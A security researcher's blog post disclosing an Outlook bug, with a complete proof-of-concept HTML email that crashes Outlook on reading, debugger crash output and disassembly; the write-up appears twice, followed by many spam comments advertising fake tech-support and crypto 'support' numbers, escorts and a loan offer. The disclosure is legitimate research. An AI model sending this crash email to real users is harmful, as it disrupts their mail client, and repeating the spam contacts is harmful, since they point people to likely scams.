Last week I reported an interesting bug in Outlook to Microsoft - it's an HTML email, and when you send this email to someone, when he/she *just read* the email, Outlook will crash (similar dangerous level as my #BadWinmail bug if this one is exploitable). As today MSRC told me that they think it's a non-exploitable bug and it seems that they are not going to fix it in near future, I'm releasing the details in this quick write-up, and hopefully, for an "old pedant" style open discussion about the exploitability as I still have some doubts.:-)
The PoC could be as simple as the following, or you may download the .eml file here.
Content-Type: multipart/alternative; boundary="===============111111111111==
MIME-Version: 1.0
Subject: title
From: aa@msft.com
To: bb@msft.com
--===============111111111111==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
plain text area
--===============111111111111==
Content-Type: text/html; charset="us-ascii"
MIME-Version: 1.0
<html>
<head>
<style>body{display:none !important;}</style>
</head>
<body>
<div>
e
</div>
<div>
<table>
<tr height="1%">
</tr>
</table>
</div>
<div>
e
</div>
</body>
</html>
--===============111111111111==--
If you do some tests based on the PoC you will quickly figure out that the CSS code "<style>body{display:none !important;}</style>" is something important here. For example, if we remove this line, Outlook won't crash. This also suggests that the bug is related to some "CSS rendering" code in Outlook.
The Crash
The following crash should be observed on Office 2010 14.0.7177.5000, full updated as of March 21, 2017. In fact, I believe it affects all Outlook versions.
(384.400): Access violation - code c0000005 (!!! second chance !!!)
eax=0020f580 ebx=0ea72288 ecx=00000000 edx=00000000 esi=191cdfd0 edi=5d064400
eip=5c5e17e5 esp=0020f56c ebp=0020f754 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
wwlib!DllGetLCID+0x25b35f:
5c5e17e5 f781e402000000040000 test dword ptr [ecx+2E4h],400h ds:0023:000002e4=????????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0020f754 5c5a2b93 wwlib!DllGetLCID+0x25b35f
0020f774 5c1d80de wwlib!DllGetLCID+0x21c70d
0020f794 5c1d801b wwlib!GetAllocCounters+0x51906
0020f818 5c1d5c33 wwlib!GetAllocCounters+0x51843
0020f82c 5c26d803 wwlib!GetAllocCounters+0x4f45b
0020f83c 2f63f1b6 wwlib!GetAllocCounters+0xe702b
0020f880 2f63f06b outlook!GetMsoInst+0x32e2
0020f8a8 2ffb9d6b outlook!GetMsoInst+0x3197
0020f938 76b0ef1c outlook!PushSavedKeyToCicero+0x291d8
0020f944 7733367a kernel32!BaseThreadInitThunk+0xe
0020f984 7733364d ntdll!__RtlUserThreadStart+0x70
0020f99c 00000000 ntdll!_RtlUserThreadStart+0x1b
It crashes at the following address:
.text:31B417D2 loc_31B417D2: ; CODE XREF: sub_31714D18+42CB1Ej
.text:31B417D2 lea eax, [ebp+var_1DC]
.text:31B417D8 push eax
.text:31B417D9 push [ebp+var_4]
.text:31B417DC push ebx
.text:31B417DD call sub_3177CE19 ;memory data at eax will be updated
.text:31B417E2 mov ecx, [eax+48h] ;read the pointer at offset 0x48
.text:31B417E5 test dword ptr [ecx+2E4h], 400h ;crash
Since the data pointed by EAX (@31B417E2) will be updated in function "sub_3177CE19", I did some debugging in that function, and it seems that:
Discussions
If security is that clear, there's no security research.:-) Due to the complexity of Office code and Microsoft keeps refusing to release Office symbols (I've said about this 1 million times), it's really hard to be that %100 sure from outside..
First point I'd put is that it's really hard to debug the data flow without symbols, if you look at the related code you will find that this isn't that firmly NULL pointer - instead the 0x00 bytes are copied from another pointer and that related to some internal structures. The 2nd is that when I tested it in a live env (email server + Outlook env), I've observed some different things. If I remember it correctly it's on an Outlook 2016 (32bit) + Windows 10 (64bit) env, when I receive/read such email, Outlook sometimes won't crash immediately, instead, it will crash at another different address when the user performs future actions on Outlook. I don't remember the details regarding the "live test", but it does increase my doubts..
To say the least, crashing someone's Outlook *remotely* is still a bad thing, right? Think about it.. someone is working on Outlook but Outlook crashes when he/she is reading the coming email..
Feel free to reach me about your thoughts.:-)
Thanks,
Haifei
The PoC could be as simple as the following, or you may download the .eml file here.
Content-Type: multipart/alternative; boundary="===============111111111111==
MIME-Version: 1.0
Subject: title
From: aa@msft.com
To: bb@msft.com
--===============111111111111==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
plain text area
--===============111111111111==
Content-Type: text/html; charset="us-ascii"
MIME-Version: 1.0
<html>
<head>
<style>body{display:none !important;}</style>
</head>
<body>
<div>
e
</div>
<div>
<table>
<tr height="1%">
</tr>
</table>
</div>
<div>
e
</div>
</body>
</html>
--===============111111111111==--
If you do some tests based on the PoC you will quickly figure out that the CSS code "<style>body{display:none !important;}</style>" is something important here. For example, if we remove this line, Outlook won't crash. This also suggests that the bug is related to some "CSS rendering" code in Outlook.
The Crash
The following crash should be observed on Office 2010 14.0.7177.5000, full updated as of March 21, 2017. In fact, I believe it affects all Outlook versions.
(384.400): Access violation - code c0000005 (!!! second chance !!!)
eax=0020f580 ebx=0ea72288 ecx=00000000 edx=00000000 esi=191cdfd0 edi=5d064400
eip=5c5e17e5 esp=0020f56c ebp=0020f754 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
wwlib!DllGetLCID+0x25b35f:
5c5e17e5 f781e402000000040000 test dword ptr [ecx+2E4h],400h ds:0023:000002e4=????????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0020f754 5c5a2b93 wwlib!DllGetLCID+0x25b35f
0020f774 5c1d80de wwlib!DllGetLCID+0x21c70d
0020f794 5c1d801b wwlib!GetAllocCounters+0x51906
0020f818 5c1d5c33 wwlib!GetAllocCounters+0x51843
0020f82c 5c26d803 wwlib!GetAllocCounters+0x4f45b
0020f83c 2f63f1b6 wwlib!GetAllocCounters+0xe702b
0020f880 2f63f06b outlook!GetMsoInst+0x32e2
0020f8a8 2ffb9d6b outlook!GetMsoInst+0x3197
0020f938 76b0ef1c outlook!PushSavedKeyToCicero+0x291d8
0020f944 7733367a kernel32!BaseThreadInitThunk+0xe
0020f984 7733364d ntdll!__RtlUserThreadStart+0x70
0020f99c 00000000 ntdll!_RtlUserThreadStart+0x1b
It crashes at the following address:
.text:31B417D2 loc_31B417D2: ; CODE XREF: sub_31714D18+42CB1Ej
.text:31B417D2 lea eax, [ebp+var_1DC]
.text:31B417D8 push eax
.text:31B417D9 push [ebp+var_4]
.text:31B417DC push ebx
.text:31B417DD call sub_3177CE19 ;memory data at eax will be updated
.text:31B417E2 mov ecx, [eax+48h] ;read the pointer at offset 0x48
.text:31B417E5 test dword ptr [ecx+2E4h], 400h ;crash
Since the data pointed by EAX (@31B417E2) will be updated in function "sub_3177CE19", I did some debugging in that function, and it seems that:
- There seems to be a custom heap allocator, as I've seen heap block headers, and links.
- The "sub_3177CE19" does the job locating the data based on the 1st param (a pointer) and 2nd param (always be 0), and the data will be copied to the heap block pointed by the 3nd param.
- According to my tests, the copied bytes are always 0x00, so that's why it seems to be a null pointer dereference bug.
Discussions
If security is that clear, there's no security research.:-) Due to the complexity of Office code and Microsoft keeps refusing to release Office symbols (I've said about this 1 million times), it's really hard to be that %100 sure from outside..
First point I'd put is that it's really hard to debug the data flow without symbols, if you look at the related code you will find that this isn't that firmly NULL pointer - instead the 0x00 bytes are copied from another pointer and that related to some internal structures. The 2nd is that when I tested it in a live env (email server + Outlook env), I've observed some different things. If I remember it correctly it's on an Outlook 2016 (32bit) + Windows 10 (64bit) env, when I receive/read such email, Outlook sometimes won't crash immediately, instead, it will crash at another different address when the user performs future actions on Outlook. I don't remember the details regarding the "live test", but it does increase my doubts..
To say the least, crashing someone's Outlook *remotely* is still a bad thing, right? Think about it.. someone is working on Outlook but Outlook crashes when he/she is reading the coming email..
Feel free to reach me about your thoughts.:-)
Thanks,
Haifei
回复删除Nice article written by author. If you have any problem regarding outlook you can contact us. We are leading third-party technical support services provider that gives the best support to the people who use technical devices like printers, antivirus software programs, and routers. We give the services through the well trained, skilled, experienced technicians who are certified by the best and well-known technology companies.
Great Article Artificial Intelligence Projects
删除Project Center in Chennai
JavaScript Training in Chennai
JavaScript Training in Chennai
Thanks making this available here in front of us. We provide matchless technical support for all queries related to Asus Router Customer Support
回复删除nice blog and thanks.
回复删除Asus router customer service
Thanks for sharing this informative post with us, keep updating us.
回复删除Cisco technical support
回复删除if you have any problem related to the d-link router then they can contact us.
d-link router customer service
thanks for this post.
回复删除Apple Airport Technical Support
many people are facing problen in their internet explorer they people can contact us we are here to provide the complete solution about the asusu router support.
回复删除internet explorer customer support
回复删除Hi Gregory Beyrer
Thanks for written nice informatics blog. i am really fan of your writing. i just write on article on outlook topic How to Create a Contact Group (Distribution List) in Outlooki Hope you will like it.
Nice to see this blog, because I really need this type of informative blog about Outlook. I’m mostly thankful to for sharing this helpful blog. For any kind of customer support services call 0800-090-3220 or visit Outlook Support Number UK
回复删除
回复删除Many people frequently visit Lahore to attend meetings and conferences. You can easily feel boredom and stressed during this. To avoid all this tension and doldrums you can take Escorts in Lahore at an affordable price. We do all arrangements for you and provide you the best companion on which you can rely and trust. You can go on a date, candlelight dinner or at your favorite place with her. Our Lahore Escorts are flexible and can stay with you the whole night. All our call girls are sexy, blonde, educated and provide best call girl service in Lahore.
It was very helpful to me. keep posting amazing stuffs. You can try Outlook email extractor tool for extracting email ids from outlook. Thanks
回复删除This article is very nice and informative, Thanks for Sharing such nice article. its explain lot of technique and Features extract email addresses from outlook
回复删除It was very helpful to me. keep sharing this type of related articles thanks !
回复删除Outlook Phone Number Extractor
Thanks for share with us, Nice information about Outlook email. if any user getting Outlook issues for technical related then just contact Outlook Customer Support Number.
回复删除canon printer customer support number
回复删除hp printer support telephone number
epson printer support toll free number
Thanks for sharing such a nice Blog.I like it.
回复删除mcafee activate product key
norton activation
norton activation
mcafee activate product key
Comcast support number
AVG contact number
webroot phone number
kaspersky customer service
Contact number for Outlook
microsoft edge support
Want to deal with the price manipulation issues for Binance? What are you looking for? Just dial Binance support number from your phone and get in touch with the professionals immediately. The experts will carefully examine your issue so that they can finalize the result-driven solutions immediately to the user so that issue get Binance Support Number resolved instantly. Lose the burden of queries by take time accessible solutions. They are approachable every time for the assistance so you can try their services as per your desire
回复删除Are you facing the issue while registration of Blockchain issue? Verification process is important as you get the access of various facilities. To get your verification done in one go, you can dial Blockchain support number and get in touch with the experts immediately. The experts immediately frame solutions and Blockchain Support NUmber methods on fingertips. Sometimes they also offer assistance to the users in stepwise manner for better understanding. So, contact them for eradicating the errors completely.
回复删除Are you facing the issue while registration of Gemini issue? Verification process is important as you get the access of various facilities. To get your verification done in one go, you can dial Gemini support number and get in touch with the experts immediately. The Gemini Support Number experts immediately frame solutions and methods on fingertips. Sometimes they also offer assistance to the users in stepwise manner for better understanding. So, contact them for eradicating the errors completely.
回复删除This is realy a Nice blog post read on of my blogs It is really helpful article please read it too my blog outlook keeps crashing problem. you can visits our websites or toll free no +1-866-558-4555. solve your problem fastly.
回复删除
回复删除Very nice post. Thanks for sharing with us.
clipping path
Looking great and it is very helpful content you can read my content here OUTLOOK KEEPS CRASHING PROBLEM.
回复删除If you are facing problem for Sbcglobal Password Reset from chrome then visits our website or call us our toll free number +1(866)213-3111
回复删除For more information visit us: http://www.itbalm.com/blog/sbcglobal-password-reset/
I really appreciate you knowledge if you are need any technical help.Information and knowledge with us so contact us and click those links
回复删除SBCGlobalservices
Contact us: +1(866)379-1999
If you are facing problem for Amazon Kindle App Not Working from chrome then visits our website or call us our toll free number +1(866)379-1999
回复删除Thanks for sharning information .....
回复删除read more blog Visit us.
Amazon Alexa not working
Contact us: +1(866)213-3111
此评论已被作者删除。
回复删除If you are facing problem for SBC Global Services from chrome then visits our website or call us our toll free number +1(866)379-1999
回复删除For more information visit us: https://medium.com/@nikjohn2000/how-to-fix-sbc-global-services-call-us-1-866-379-1999-238ae7a97f8a
For more information visit us: https://lets-assists.blogspot.com/2020/01/how-to-fix-sbc-global-services-call-us.html
For more information visit us: https://meganikjohn.tumblr.com/post/190093698162/how-to-fix-sbc-global-services-call-us
If you are facing problem for Roku error code 003 from chrome then visits our website or call us our toll free number +1(866)379-1999
回复删除I am impressed with your article, please keep it on. Many foremost magazines have released his blogs on the websites respectively. Yahoo Mail not responding I love to write about different-different issues.
回复删除If you are facing problem for Facebook notifications not working from chrome then visits our website or call us our toll free number +1(866)379-1999
回复删除If you are facing problem for SBC Global services from chrome then visits our website or call us our toll free number +1(866)379-1999
回复删除My best opinion will be that you should use Gmail or iCloud. I am also a blogger and I have written something on how to change Apple ID password. Please, Go check on my blog and give me review about this.
回复删除I really appreciate you knowledge if you are need any technical help.Information and knowledge with us so contact us and click those links
回复删除Combine video on youtube
Contact us: +1(866)235-4333
此评论已被作者删除。
回复删除Looking for Contact Outlook Support UK, visit on:
回复删除Phone Number For Outlook Support UK
Gmail has, since its users ongoing using, been achieved a pinnacle in offering excellent service with several user-friendly features. However, some of its users are having the issue of Gmail not receiving emails iphone into their inbox. If you want to eliminate the issue, reach professionals to get rid of all sorts of issues.
回复删除Yahoo Temporary Error 19: How to Troubleshoot It?
回复删除Troubleshooting Yahoo temporary errors can easily be done with just a few fixing techniques. Yet, many users are failed to apply some sort of basic method to fix Yahoo temporary error 19 on their own. If you are failed to fix the error issue, you must contact our Yahoo team straight away.
How to Troubleshoot Yahoo Mail Not Receiving Emails?
回复删除Yahoo mail is one of the most popular services among all services provided by Yahoo. The e-mail provider is also known for its quick sending and receiving emails. However, some users are facing the issue of yahoo not receiving emails 2020. If you are encountering the same issue, you must get in touch with our expert.
How Do I Troubleshoot Yahoo Mail Not Receiving Emails Facebook?
回复删除Every user would admire the use of Yahoo mail for emailing service. Recently, some users are complaining about the issue of yahoo not receiving emails from Facebook. In case, you are encountering such an issue and failed to troubleshoot it on your own, don’t worry, our executives would help you out from this.
回复删除Helpful artical.
Thanks for a well written and informative post.
How to Fix Outlook is Using an Old Copy of Your Outlook Data File (.OST) Issue?
Gmail Temporary Error Code 6: How to Troubleshoot It?
回复删除Gmail errors are predominantly temporary and easily get away from them after a while. However, when the error is due to technical glitches, then for users it is trickier to fix the error code. One such error is Gmail temporary error numeric code 6. If you are getting such an error code while trying to access your email account, get in touch with our executive member straight away.
How to Troubleshoot My Gmail Not Receiving Emails?
回复删除Gmail is best known for its quick sending and receiving emails, yet in many instances, users find the issue of their Gmail not receiving emails 2020 anymore. If you are having such an issue in your email account too, it is suggestible to get connected with our team and resolve the issue in a quickest manner.
If you want to know how to setup Netgear Wi-Fi router, you need to consider some simple points to remember that you are choosing the correct process for your router; you can use the Nighthawk app to get help in the process and to choose the settings of your router. You may also need to configure your router in a correct way.
回复删除How to Troubleshoot AOL Mail Not Working Properly?
回复删除AOL mail is a well-known email client, offers a safe and delightful email experience to its users. But when it comes to accessibility, the webmail works exceptionally well. If you are facing your AOL mail not working on the browser you use, you must get in touch with our AOL service executive straight away.
Contact MS Office setup with MS Office setup Assistance Experts If you want to know, how to Improve Unsaved MS Office Data? Dial Office.com/setup and update your MS Office setup to use all functions. https://office-setup.us/
回复删除此评论已被作者删除。
回复删除此评论已被作者删除。
回复删除此评论已被作者删除。
回复删除Looking for Outlook Support UK, visit on: Microsoft Exchange Contact Number
回复删除Looking for Office 365 Support UK call on 0808 164 2786 , visit on: Office 365 Support UK
回复删除Good. I am really impressed with your writing talents and also with the layout on your weblog. Appreciate, Is this a paid subject matter or did you customize it yourself? Either way keep up the nice quality writing, it is rare to peer a nice weblog like this one nowadays. Thank you, check also virtual edge and How to Set Up A Virtual Recruiting Event
回复删除
回复删除my printer is showing offline how to fix
my printer shows offline
how do you change a printer from offline to online
printer is showing offline
why my printer is showing offline
jibjab alternative|ashley jade stern|lola Iolani Momoa|Sydney Brooke Simpson|
回复删除Sawda Capital Finance is a reputed and licensed moneylender, offering loans at low interest rates. The company is registered with the ministry of law. Our mission is to help people who are in need of cash by lending them money. We do not need any credit score, collaterals and deposits to process your loan request.
回复删除Some of the services provided by the company are:
1. Personal Loans
2. Business Loans
3. Payday Loans
4. Debt Consolidation Loans
Apply for a loan today.
Email: sawda.finance@gmail.com
Phone: +12139927693
WhatsApp: +12139927693
Excellent post! Your post is very useful and I felt quite interesting reading it. Expecting more post like this. Thanks for posting such a good post. laptop service in home. To service your laptop with offer prices, Please visit : Laptop service center in Navalur
回复删除